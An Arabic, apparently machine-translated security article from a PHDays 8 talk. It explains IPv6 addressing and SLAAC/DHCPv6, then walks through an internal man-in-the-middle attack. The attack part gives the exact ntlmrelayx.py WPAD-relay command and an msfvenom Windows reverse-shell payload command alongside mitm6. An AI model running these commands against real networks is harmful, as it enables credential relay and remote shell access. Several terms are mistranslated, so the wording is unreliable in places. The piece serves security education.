IPv6 هو إصدار جديد من بروتوكول الإنترنت. قبل أعضاء IETF قبل 22 عامًا فقط ، في عام 1996. خلال هذا الوقت ، تمكنت هجمات IPv6 محددة من الظهور. الغرض من هذه المقالة ، استنادًا إلى عرضنا التقديمي في
PHDays 8 ، هو إظهار إمكانات هجوم على شبكات الشركات من قبل متطفل داخلي باستخدام IPv4 و IPv6.
أساسيات عنونة IPv6
يبلغ طول عنوان IPv6 128 بت ، وهي مكتوبة بتنسيق سداسي عشري مع تقسيم العنوان بالكامل إلى 8 مجموعات. مثال على كتابة عنوان IPv6:
2001: 0a00: مقهى: فاتنة: 0001: 0000: 0000: 0011/64
يوجد سجل عناوين مبسط عندما يمكن استبدال العديد من مجموعات الأصفار اللاحقة بـ "::" ، ولكن مرة واحدة فقط. يمكن تجاهل الأصفار المكتوبة إلى اليسار في كل مجموعة. لذلك ، يمكن كتابة العنوان أعلاه على النحو التالي:
2001: a00: مقهى: فاتنة: 1 :: 11/64
الحجم القياسي لجزء المضيف الذي أصدره الموفر للعميل هو 64 بت ، 4 منها تستخدم لتقسيم الشبكة إلى شبكات فرعية.
هناك عدة أنواع من العناوين في IPv6:
البث الأحادي العالمي هو تناظري للعناوين العامة في IPv4. هذه العناوين صادرة عن
IANA وهي فريدة عبر الإنترنت. تقع هذه العناوين في النطاق 2000 :: / 3 (2000 - 3FFF).
العناوين المحلية (Link-local) - العناوين في النطاق FE80 :: / 10 (FE80 - FEBF) يتم إنشاؤها تلقائيًا بواسطة الأجهزة وتستخدم للتفاعل مع الأجهزة الأخرى على نفس الشبكة المحلية. لا يجب توجيه حركة المرور التي تحتوي على هذا العنوان كمرسل أو مستلم. وبالتالي ، يمكن للجهاز الذي يدعم IPv6 والمتصل بالشبكة تبادل المعلومات على الفور داخل شبكته الفرعية دون أي تكوين.
عنوان الاسترجاع :: 1 . هذا العنوان مشابه لـ 127.0.0.1 في IPv4. الحزم المرسلة إليها لا تترك الجهاز.
عنوان غير محدد - العنوان "::" ، المكون من أصفار فقط. يتم استخدامه في بعض الحالات كمرسل حتى يتم استلام العنوان.
عناوين محلية فريدة (محلية فريدة) - نظير لعناوين خاصة في IPv4 ، يمكن توجيهها داخل الشبكة الداخلية للمؤسسة ، دون إمكانية التوجيه إلى الإنترنت. مساحة عنوان IPv6 كبيرة جدًا بحيث يمكن إصدار أكثر من تريليون عنوان لكل شخص على هذا الكوكب ولن تنتهي. لذلك ، يعني IPv6 التخلي عن العناوين الخاصة بمعنى استخدامها في IPv4 بسبب نقص العناوين العامة.
عناوين IPv4 المعينة إلى IPv6 (IPv4 مضمن) - عناوين IPv6 التي تبدأ بـ :: ffff: آخر 32 بت تحتوي على عنوان IPv4 (:: ffff: xxxx: xxxx ، حيث xxxx: xxxx هو عنوان IPv4 الذي تم تحويله إلى سداسي عشري). تُستخدم هذه العناوين للأجهزة التي لا تدعم IPv6 وتوفر طريقة لتعيين مساحة عنوان IPv4 إلى مساحة عنوان IPv6.
عناوين الإرسال المتعدد (Multicast) - أحد التغييرات الرئيسية في IPv6 مقارنة بـ IPv4. رفض البروتوكول الجديد حزم البث ، بدلاً من استخدام عناوين البث المتعدد عناوين البث. تقع جميع هذه العناوين في النطاق FF00 :: / 8
تعيين عنوان IPv6
يستخدم IPv6 بروتوكول اكتشاف الجوار (ND) الخاص بـ ICMPv6 للحصول على معلومات العنوان. كما هو موضح في الشكل أدناه ، عندما يظهر جهاز جديد على شبكة IPv6 ، يرسل الجهاز طلبًا للحصول على عنوان IPv6 (طلب جهاز التوجيه) إلى "ff02 :: 2" (جميع أجهزة توجيه الشبكة). يستجيب جهاز التوجيه برسالة (إعلان جهاز التوجيه) تحتوي على معلومات حول كيفية الحصول على عنوان IPv6. اعتمادًا على العلامات المحددة في الرسالة ، هناك ثلاث طرق:
| طريقة الحصول على العنوان | علم (تلقائي) | علم O (أخرى) | علم M (مُدار) |
|---|
| SLAAC (افتراضي) | 1 | 0 | 0 |
| SLAAC + DHCPv6 | 1 | 1 | 0 |
| DHCPv6 | 0 | - | 1 |
SLAAC (التكوين التلقائي لعنوان بلا حالة) - في هذه الحالة ، كل ما يلزم لإنشاء عنوان IPv6 عالمي موجود في رسالة RA.
SLAAC + DHCPv6 - وكذلك في حالة SLAAC ، يتم إنشاء العنوان استنادًا إلى المعلومات الموجودة في حزمة RA ، ولكن يتم تعيين إشارة O أيضًا ، مما يعني تكوين آخر ، ويجب على الجهاز الاتصال بخادم DHCPv6 للحصول على إعدادات إضافية ، على سبيل المثال ، خادم DNS.
DHCPv6 هو عنوان تناظري لعنوان DHCPv4 ويتم إصدار جميع المعلومات الأخرى بواسطة خادم DHCP ، باستثناء البوابة الافتراضية ، والتي يتم أخذها من عنوان المرسل لحزمة RA.
عند ضبط أعلام O و M في نفس الوقت ، يتم تجاهل علامة O.
كمثال ، خذ الأداة المساعدة fake_router26 من مجموعة الأدوات thc
-ipv6 . تُظهر الصورة أنه بعد البدء ، تمت إضافة عنوان IPv6 للبوابة الافتراضية ، والذي أصبح أولوية على IPv4.
هجوم!
في هذا السيناريو ، سننظر في إمكانية هجوم رجل في الوسط باستخدام آلية الحصول على إعدادات شبكة IPv6.
للتظاهر ، نحتاج إلى 4 سيارات:
آلة المهاجم هي كالي لينكس.
جهاز الخادم الذي سيتم تشغيل كرات إدارة Windows 7 عليه.
جهاز عميل يمكنه الوصول إلى خادم Windows 7.
جهاز توجيه مزود بتمكين DHCPv4.
وصف dirkjanm
منهجية هذا السيناريو. كتب الأداة المساعدة mitm6 ، التي تستخدم بروتوكول ND ، ترسل رسائل إعلان جهاز التوجيه مع تعيين علامتي "O" و "M" على "1". وبالتالي ، يعرف العملاء أنه من الضروري طلب معلومات العنوان من خادم DHCPv6. يبدأ العملاء في إرسال رسائل DHCPv6 SOLICIT لاكتشاف خادم DHCP. تستجيب الأداة المساعدة للطلبات مع رسائل DHCPv6 ADVERTISE ؛ يحتوي الرد على عنوان الجهاز المهاجم كخادم DNS.
بعد ذلك ، وبسبب الميزات المعمارية لنظام التشغيل ، يصبح DHCPv6 DNS أولوية. يمكن للمهاجم الآن الرد على أي استفسارات DNS بالعنوان الصحيح. وبالتالي ، سيتم إرسال الطلب الذي تم إرساله بواسطة اسم المجال لتقدير المهاجم.
من خلال تشغيل mitm6 ، يمكنك تحديد المجال الذي سيتم استبدال عناوين DNS الخاصة به.
الكرات الادارية
لتعزيز التأثير الدرامي ، لنفترض أن هناك جهازًا آخر على الشبكة يُسمح لمستخدم الجهاز الأول بالاتصال بالكرات الإدارية فيه. يتم إيقاف تشغيلها افتراضيًا ، ولكن على الإنترنت يهتم الكثير من الأشخاص بكيفية تشغيلها ، وهم سعداء جدًا عندما يحصلون عليها.
WPAD (Web Proxy Auto Discovery) هو بروتوكول لتحديد موقع الملف الذي توجد فيه إعدادات الوكيل الافتراضية.
بعد تحديث
MS16-077 ، لم يعد يتم إعطاء wpad من خلال NETBIOS ولا تتم مصادقته تلقائيًا على الخادم الوكيل.
لتجاوز هذه القيود ، يمكنك استخدام ntlmrelayx.py ، وهو جزء من
impacket . مطلوب إصدار أعلى من 0.9.16 ، والذي يتضمن دعم IPv6 والقدرة على تثبيت خادم يعرض wpad صالح. يتم الإطلاق من قبل الفريق
ntlmrelayx.py -6 -wh at.localdomain -t smb://192.168.56.7 -e 1.exe
حيث 1.exe هو الحمولة الصافية العكسية الناتجة عن metasplit.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.6 LPORT=444 -f exe -o 1.exe
تشير المعلمة -wh إلى المضيف الذي يوجد فيه ملف wpad (سترد الأداة المساعدة mitm6 بعنوان المهاجم على هذا الطلب)
بعد الاتصال ، سيتم طلب مصادقة HTTP 407 (مطلوب مصادقة الوكيل) ، والتي تتم مصادقة المتصفح تلقائيًا عليها.
سيتم استخدام البيانات المستلمة للاتصال ب smb للخادم المهاجم ، الذي تم تمريره من خلال المعلمة -t.
أشكر مؤلفي المشارك Sergey Ovchinnikov
malchikserega للمساعدة في إعداد العرض التقديمي والمقالة.